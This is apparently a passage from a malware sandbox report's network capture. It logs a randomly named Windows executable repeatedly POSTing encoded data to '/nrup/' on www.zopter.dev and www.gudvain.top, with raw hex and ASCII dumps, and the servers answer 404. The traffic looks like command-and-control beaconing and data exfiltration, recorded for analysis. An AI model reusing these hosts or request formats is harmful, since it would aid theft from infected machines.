pX6dR=v1vgwyTL1KwWCbxUN0ky+YcbiHf/A7uJypbDZSD1EjIOizgDQRcbJMzpcddWWHXT/BofzuekPtmLPAJPlyNAlqpT2TUABNT9YSDebL0/rBgJcGS65t4k4hySdRm/GmaeMpuaBRkxV3dviIugqwsSqruGPqt7ZoRG7Uyk++O9yNacvawSEBVNOjJ+CrX9YNBXoIId1hBdM8rBuG34+hWEFYiLZAmNb4PRPBX+IkyihGswcesMLM7M22K/Ti8o4ED/CfjysLWpPcQdZyk6R8C74AtitIJnGUirM0Gwkwsbcme3qk/CcRz5CbL+QaKT/fA0kegaluQMysKeBxyR16JNwIGGuEzOr0rayCnQP/hRHwra0NfvxVe5b878baIbZA/7FLZdNZ1TmRrs5tDYwrH8GfiPR9Mh72miOnvldFCtTtlSsMvs0Bkpg3dedUQT/y+c5q5zUdMlKhlhWMqms1YVs5uK6vAFEQOnsSYz0QbT+l4XT5N+Q3zLRhhDwHKMTaW5iEv8HyoZIzdUX72sJoQ7EHmz7oHydlhqnHCdnaGviPF3ZOyM7gAYE2MzSg/dNGTRNOLJPYGqo8ybSeoXHtll7juHUDTAqUTd2yih87BQywkbxfEs96C/1FdXTJ30VQ97VvzcatrTI3PsfTmSqrjvfjP/t7N+MgcbheNkxwHo6sWBCTYu9i0vV2rBAmzzRXq1UD9ZJJcgjCxK6IdzvoGDSjgTdDy4hR7hqWDDRzR/MJIvmPMQzwBFOnfaHmF28b4sIxol6Q4e+eKvxtFuS/NNIe/mchHzKip6PSYCTGqy5uw6DKiHbDGZVn4YuoSKpno79yzBIQUIvA2p8ckpC5eztL6PbW21rAuBw/vdPHCBqG5sE1SoFdPrMKC1Dr+Be8nxd7hNf1OWFUCtUFtkEWR3uP5lTYIAoyNUwBh/vWBDze9GVI0l+sIuKB0P89S2E7htt3bVVHKD4L2aNflG8tQNQylFpTpsVAAIVf/aUP2FnFKIZK [TRUNCATED]
May 3, 2024 11:33:36.112123966 CEST	110	OUT	Data Raw: 6a 70 30 4e 41 44 4a 41 4a 72 65 42 4f 56 5a 55 6f 53 50 53 76 58 70 58 30 64 54 63 61 52 79 56 6b 65 46 69 35 41 51 38 2b 32 47 37 75 38 69 4a 71 33 57 61 79 64 4d 34 67 46 67 4a 47 36 2f 41 54 6d 31 5a 70 42 63 67 4a 2b 6c 4f 74 67 4e 48 42 58 Data Ascii: jp0NADJAJreBOVZUoSPSvXpX0dTcaRyVkeFi5AQ8+2G7u8iJq3WaydM4gFgJG6/ATm1ZpBcgJ+lOtgNHBXzL8zJ5p4x/Ngih/E+hyFH+0rSm23
May 3, 2024 11:33:36.288728952 CEST	747	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Apr 2019 05:26:34 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 462 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e [TRUNCATED] Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41\|nIPy"4mU1d}{*<g\|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs\|C^N?!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49179	192.185.225.30	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:38.630331039 CEST	727	OUT	POST /nrup/ HTTP/1.1 Host: www.zopter.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.zopter.dev Connection: close Content-Length: 202 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.zopter.dev/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 76 31 76 67 77 79 54 4c 31 4b 77 57 43 61 78 55 66 57 63 79 2f 34 63 62 68 48 66 2f 4a 62 76 43 79 70 58 78 5a 58 6a 6c 52 46 49 4f 6c 6e 6f 44 51 43 30 62 49 4d 7a 6f 58 39 64 61 49 33 57 52 2f 42 6f 35 7a 73 4b 6b 50 74 79 4c 4f 69 42 50 6a 32 5a 44 36 71 70 64 76 44 55 64 42 4e 57 4a 59 53 4f 62 62 4c 63 2f 72 44 6b 4a 66 47 43 36 72 62 6b 6b 75 42 7a 34 4a 68 6e 39 47 6d 47 4c 4d 6f 65 43 42 53 41 78 56 46 35 76 6c 5a 4f 67 37 33 77 53 77 62 75 4c 51 71 74 71 5a 74 49 58 6a 45 2b 6d 39 75 79 73 37 39 75 43 79 61 6b 38 46 77 31 63 4b 67 56 78 50 2b 4f 5a 61 76 4d 38 35 77 3d 3d Data Ascii: pX6dR=v1vgwyTL1KwWCaxUfWcy/4cbhHf/JbvCypXxZXjlRFIOlnoDQC0bIMzoX9daI3WR/Bo5zsKkPtyLOiBPj2ZD6qpdvDUdBNWJYSObbLc/rDkJfGC6rbkkuBz4Jhn9GmGLMoeCBSAxVF5vlZOg73wSwbuLQqtqZtIXjE+m9uys79uCyak8Fw1cKgVxP+OZavM85w==
May 3, 2024 11:33:38.815211058 CEST	747	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:38 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Apr 2019 05:26:34 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 462 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e [TRUNCATED] Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41\|nIPy"4mU1d}{*<g\|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs\|C^N?!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49180	192.185.225.30	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:41.336074114 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.zopter.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.zopter.dev Connection: close Content-Length: 3626 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.zopter.dev/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 76 31 76 67 77 79 54 4c 31 4b 77 57 44 35 70 55 4d 6e 63 79 35 59 63 59 39 58 66 2f 41 37 75 4c 79 70 62 78 5a 53 44 31 45 68 73 4f 69 30 67 44 51 68 63 62 62 38 7a 6f 41 4e 64 57 57 48 58 55 2f 42 39 43 7a 75 53 65 50 76 65 4c 50 45 64 50 6c 7a 4e 41 78 36 70 54 2b 7a 55 43 42 4e 57 63 59 53 65 45 62 4c 5a 51 72 44 73 4a 63 77 57 36 70 72 6b 6e 68 68 7a 34 4a 68 6e 35 47 6d 48 71 4d 70 32 4b 42 51 77 68 56 33 68 76 69 34 75 67 2b 51 73 52 79 62 76 43 4c 71 74 39 5a 6f 56 37 37 55 7a 74 2b 39 79 58 79 4e 57 63 39 5a 49 53 45 48 64 4f 42 54 4a 78 4d 4c 58 39 57 74 42 5a 6f 49 4a 66 31 68 42 64 4d 39 48 42 75 57 33 34 2b 6a 2b 48 59 6f 69 4c 58 67 6d 4b 56 59 44 46 50 43 72 63 49 6b 6a 66 30 68 30 77 64 63 45 4d 4f 38 37 4d 33 47 4c 36 54 69 38 70 32 6b 43 65 43 66 36 50 73 4c 47 41 50 63 51 64 5a 77 63 36 56 70 57 37 38 51 74 69 79 59 4a 6d 66 6b 69 6f 4d 79 61 43 6b 78 6f 62 63 6e 57 33 70 30 50 43 61 58 6e 36 4e 4c 4c 2f 55 61 4b 64 37 66 41 45 6b 65 38 77 6c 75 5a 68 79 76 43 65 [TRUNCATED] Data Ascii: pX6dR=v1vgwyTL1KwWD5pUMncy5YcY9Xf/A7uLypbxZSD1EhsOi0gDQhcbb8zoANdWWHXU/B9CzuSePveLPEdPlzNAx6pT+zUCBNWcYSeEbLZQrDsJcwW6prknhhz4Jhn5GmHqMp2KBQwhV3hvi4ug+QsRybvCLqt9ZoV77Uzt+9yXyNWc9ZISEHdOBTJxMLX9WtBZoIJf1hBdM9HBuW34+j+HYoiLXgmKVYDFPCrcIkjf0h0wdcEMO87M3GL6Ti8p2kCeCf6PsLGAPcQdZwc6VpW78QtiyYJmfkioMyaCkxobcnW3p0PCaXn6NLL/UaKd7fAEke8wluZhyvCeB0mR3bJNwYGF2UzC6lWOyCvyP/1BH27a1cfv2XG6Gc72caIBLw+KFLt3NYVTmEPs4sjY64vjAviMV9M2wWn1OnrtdESbTfNS2cvskSMouHdbaURaqC/R5q5BUZYqKUBhWNamvnwVs5uJ9vAfdlWFsSE/0QHD+jUXTp9+Q2zLJxhDoXKxa6WJiA/GHzQJLDZUXZ+sa6I7V3mx5oHxZlh3nHSdnbyFiPt3ZvyM5BAYMWM3NQ/CNGTrNPbFPcbdo+WbSfoXBsll2DuGSDSJh0Sr2yqx86N6y0wb38cs8LC/1ldCRJ30Dg9jVrfiap+mI23sfi2S+7joRDP4gbN9IgcNhedkxwbo6sOBCggusBsvcmrDEmzTb3nNUDN7JLwOjE5K7dpz4cmEdzhYYDz3lR6GqWDHRyJRP4ovjN0QjhBGI3eccWFlz75TIx4P6RNVr9uvxtVuSs1NIu/mchHwKip+PSdmTEyc5uw6CYaHbxuZeH4ZhISB+3o59y3dIQc2vGCp8MEpC5eywL6MeW22rF2mw/v/PHOBq11sW0yoF+nrKqC1Er+AQcn0d7hnfw3TFVCtU1NkDQl0xP5kVYJLxiBfwBddvXVDzvNGXacl+cIuVR0IkNSnaLdpt3u4VDPb5+SaMsdG+q8SdilEkzp9VA92VfnSUO+VnG6IZq [TRUNCATED]
May 3, 2024 11:33:41.509609938 CEST	1574	OUT	Data Raw: 6a 52 30 4e 4a 49 4a 42 55 32 65 44 75 56 5a 52 30 53 4f 69 76 57 67 48 30 58 64 38 61 39 79 56 6f 6a 46 69 68 71 51 38 4f 32 47 36 53 38 6a 74 4f 33 43 4b 79 64 51 49 67 41 6a 4a 48 38 67 77 66 6c 31 5a 51 75 63 55 6c 74 6a 4a 64 69 45 55 35 6c Data Ascii: jR0NJIJBU2eDuVZR0SOivWgH0Xd8a9yVojFihqQ8O2G6S8jtO3CKydQIgAjJH8gwfl1ZQucUltjJdiEU5l3aQYMrhNzLZhvxXKrQaSQ6ItdgbfwpZDHFd4Hq5K0pQ8BDvTjwBXRaUnuM8OeONdjgOyJNOFR0ID3fsH087i/HLzA/X6H/zlBuixSd1EazLz/urj7DQ+xVeRHRKdRWGpBiYK5m6uWKS9vJFMZ2z7W47oSYmAqigba
May 3, 2024 11:33:41.685367107 CEST	747	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:41 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Apr 2019 05:26:34 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 462 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e [TRUNCATED] Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41\|nIPy"4mU1d}{*<g\|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs\|C^N?!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49181	192.185.225.30	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:44.028136969 CEST	469	OUT	GET /nrup/?pX6dR=i3HAzC/U9OJxIpd/aE0q2q4opSPsJIGS67PrGCHTQB0skmoYQlANVfiIbPI4IH/9kWpHr7erIPqYDzNgqjstw7965i84C6yRej7jTb0tuQprc2OKqp4FpQOaHFX3&tv=6TdD8B HTTP/1.1 Host: www.zopter.dev Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
May 3, 2024 11:33:44.218744040 CEST	1007	IN	HTTP/1.1 404 Not Found Date: Fri, 03 May 2024 09:33:44 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Apr 2019 05:26:34 GMT Accept-Ranges: bytes Content-Length: 746 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49182	203.161.62.199	80	2972	C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Timestamp	Bytes transferred	Direction	Data
May 3, 2024 11:33:49.534950972 CEST	2578	OUT	POST /nrup/ HTTP/1.1 Host: www.gudvain.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.gudvain.top Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.gudvain.top/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 66 67 62 6e 6b 36 4f 36 38 6e 59 58 66 71 49 62 68 2b 70 38 6f 71 56 49 65 6a 57 63 32 77 31 33 75 4d 4d 4a 70 63 55 6f 6f 30 76 32 33 73 55 46 73 53 33 63 54 74 74 4e 45 75 50 58 7a 67 6b 33 53 75 73 6a 53 6f 45 36 77 50 62 37 59 39 41 52 32 36 56 50 78 34 48 44 79 35 69 6e 4c 30 56 63 6d 39 77 50 7a 55 36 48 2f 34 33 49 38 75 6f 54 45 52 59 34 32 71 36 76 42 35 39 39 2b 41 44 46 4a 55 4b 33 6f 2b 77 46 65 6b 49 34 47 54 77 6b 58 73 33 33 38 4b 72 51 70 63 59 48 45 7a 38 53 50 78 6a 78 6d 34 34 78 6b 6b 78 42 6b 68 73 6f 2b 6e 6a 2b 6a 56 71 71 7a 36 7a 5a 66 4a 44 4c 78 58 79 65 78 59 76 44 32 2f 4e 38 4d 4d 4d 6b 4c 73 6c 42 77 48 4e 4e 41 70 4d 38 79 6c 2b 6f 66 6a 51 75 2b 6a 4e 76 46 4d 52 76 56 6e 42 2b 64 6a 31 43 4f 6b 45 62 2b 78 77 4a 47 41 53 4b 63 71 59 65 44 52 72 52 53 4d 49 49 6e 35 59 4f 42 62 68 67 4b 71 34 74 55 2f 46 72 54 55 4e 68 4a 31 78 51 43 35 36 7a 43 6f 6f 2b 64 51 41 75 64 6c 39 79 4b 2b 49 2f 61 35 57 2f 42 4a 69 68 46 56 7a 4c 36 65 64 68 4b 79 51 57 [TRUNCATED] Data Ascii: pX6dR=fgbnk6O68nYXfqIbh+p8oqVIejWc2w13uMMJpcUoo0v23sUFsS3cTttNEuPXzgk3SusjSoE6wPb7Y9AR26VPx4HDy5inL0Vcm9wPzU6H/43I8uoTERY42q6vB599+ADFJUK3o+wFekI4GTwkXs338KrQpcYHEz8SPxjxm44xkkxBkhso+nj+jVqqz6zZfJDLxXyexYvD2/N8MMMkLslBwHNNApM8yl+ofjQu+jNvFMRvVnB+dj1COkEb+xwJGASKcqYeDRrRSMIIn5YOBbhgKq4tU/FrTUNhJ1xQC56zCoo+dQAudl9yK+I/a5W/BJihFVzL6edhKyQWWIkFID1B6DWVUNLDFD/qnf0enSDV3k7vI1x5L0LE5r9a3UrPuukGKuIYxHPoycA8snRw5MSfyNEawLL3zDRKTm4JqhUdShH6LGGxu04AtxkCr3A/0ix9mzFdrBjKyBjh2fNSMKEs9X4HeaMV1V0PYBcJvBVIl5hWzAxE89DCq8Qm2jOsNxmjdgL6YTZwVDIyCPf2klTMjYf1//xJnoWH6CyUJCHBhUzlkWDoN1rQytJgnYJLGrH+t4+tOuf1Nwp20MtnnXTWF3goZ3Fm1h8g/Wuvbgb1cSmm/8EiiBZBptusnMNP6y6rUGvSaboOKQKpdg9cUHzSPZUtRQxlz1BCXmGdc08DPMS5Eqza/HKA372Z3r0mvYxfGyGNiegs+dUZuMTwYE1XtzxyMJCZ/4yiez5kfzOEeOaETW0duH3kOQDRtYg5J0WrP/7u4cTfdg55R+9Q4ZLkM/KPCbL8UvyBZFmKV9WQJ5LQlqAus+V3gV/wq27itIQPNnJtGk3ZpiCXyAc2ZCFOBdlKhdRaI8ZjII/Hx1X4+gzU7el5UMuUWqQRU0zQ41iqa4+ppJ4cL9VJZmSLJ4FKw/wcIHJhMvZhjh4EjudJLUyY/unRIuANOAsTqfaKhlIausUHqRDCffmKhHR7MtdlyIgZIpLHH8JpNMhoUHYoS6fxFs [TRUNCATED]
May 3, 2024 11:33:50.047007084 CEST	1289	OUT	POST /nrup/ HTTP/1.1 Host: www.gudvain.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.gudvain.top Connection: close Content-Length: 2162 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.gudvain.top/nrup/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 70 58 36 64 52 3d 66 67 62 6e 6b 36 4f 36 38 6e 59 58 66 71 49 62 68 2b 70 38 6f 71 56 49 65 6a 57 63 32 77 31 33 75 4d 4d 4a 70 63 55 6f 6f 30 76 32 33 73 55 46 73 53 33 63 54 74 74 4e 45 75 50 58 7a 67 6b 33 53 75 73 6a 53 6f 45 36 77 50 62 37 59 39 41 52 32 36 56 50 78 34 48 44 79 35 69 6e 4c 30 56 63 6d 39 77 50 7a 55 36 48 2f 34 33 49 38 75 6f 54 45 52 59 34 32 71 36 76 42 35 39 39 2b 41 44 46 4a 55 4b 33 6f 2b 77 46 65 6b 49 34 47 54 77 6b 58 73 33 33 38 4b 72 51 70 63 59 48 45 7a 38 53 50 78 6a 78 6d 34 34 78 6b 6b 78 42 6b 68 73 6f 2b 6e 6a 2b 6a 56 71 71 7a 36 7a 5a 66 4a 44 4c 78 58 79 65 78 59 76 44 32 2f 4e 38 4d 4d 4d 6b 4c 73 6c 42 77 48 4e 4e 41 70 4d 38 79 6c 2b 6f 66 6a 51 75 2b 6a 4e 76 46 4d 52 76 56 6e 42 2b 64 6a 31 43 4f 6b 45 62 2b 78 77 4a 47 41 53 4b 63 71 59 65 44 52 72 52 53 4d 49 49 6e 35 59 4f 42 62 68 67 4b 71 34 74 55 2f 46 72 54 55 4e 68 4a 31 78 51 43 35 36 7a 43 6f 6f 2b 64 51 41 75 64 6c 39 79 4b 2b 49 2f 61 35 57 2f 42 4a 69 68 46 56 7a 4c 36 65 64 68 4b 79 51 57 [TRUNCATED] Data Ascii: pX6dR=fgbnk6O68nYXfqIbh+p8oqVIejWc2w13uMMJpcUoo0v23sUFsS3cTttNEuPXzgk3SusjSoE6wPb7Y9AR26VPx4HDy5inL0Vcm9wPzU6H/43I8uoTERY42q6vB599+ADFJUK3o+wFekI4GTwkXs338KrQpcYHEz8SPxjxm44xkkxBkhso+nj+jVqqz6zZfJDLxXyexYvD2/N8MMMkLslBwHNNApM8yl+ofjQu+jNvFMRvVnB+dj1COkEb+xwJGASKcqYeDRrRSMIIn5YOBbhgKq4tU/FrTUNhJ1xQC56zCoo+dQAudl9yK+I/a5W/BJihFVzL6edhKyQWWIkFID1B6DWVUNLDFD/qnf0enSDV3k7vI1x5L0LE5r9a3UrPuukGKuIYxHPoycA8snRw5MSfyNEawLL3zDRKTm4JqhUdShH6LGGxu04AtxkCr3A/0ix9mzFdrBjKyBjh2fNSMKEs9X4HeaMV1V0PYBcJvBVIl5hWzAxE89DCq8Qm2jOsNxmjdgL6YTZwVDIyCPf2klTMjYf1//xJnoWH6CyUJCHBhUzlkWDoN1rQytJgnYJLGrH+t4+tOuf1Nwp20MtnnXTWF3goZ3Fm1h8g/Wuvbgb1cSmm/8EiiBZBptusnMNP6y6rUGvSaboOKQKpdg9cUHzSPZUtRQxlz1BCXmGdc08DPMS5Eqza/HKA372Z3r0mvYxfGyGNiegs+dUZuMTwYE1XtzxyMJCZ/4yiez5kfzOEeOaETW0duH
May 3, 2024 11:33:50.205008984 CEST	113	OUT	Data Raw: 50 6e 50 2f 48 52 47 33 39 6b 66 6b 46 76 73 68 59 48 6c 48 31 55 4c 4e 35 54 6a 6f 74 6e 57 6d 42 35 2f 6a 6d 6b 4b 36 6e 62 53 49 51 68 4d 74 51 54 53 56 30 65 45 74 2b 76 32 69 79 42 4f 2f 43 2b 63 73 4f 45 4e 49 46 4c 7a 2f 45 6f 63 38 75 47 Data Ascii: PnP/HRG39kfkFvshYHlH1ULN5TjotnWmB5/jmkK6nbSIQhMtQTSV0eEt+v2iyBO/C+csOENIFLz/Eoc8uGoGV0E4wmx0aiaXoJ+LmWrleAqYw/4qH
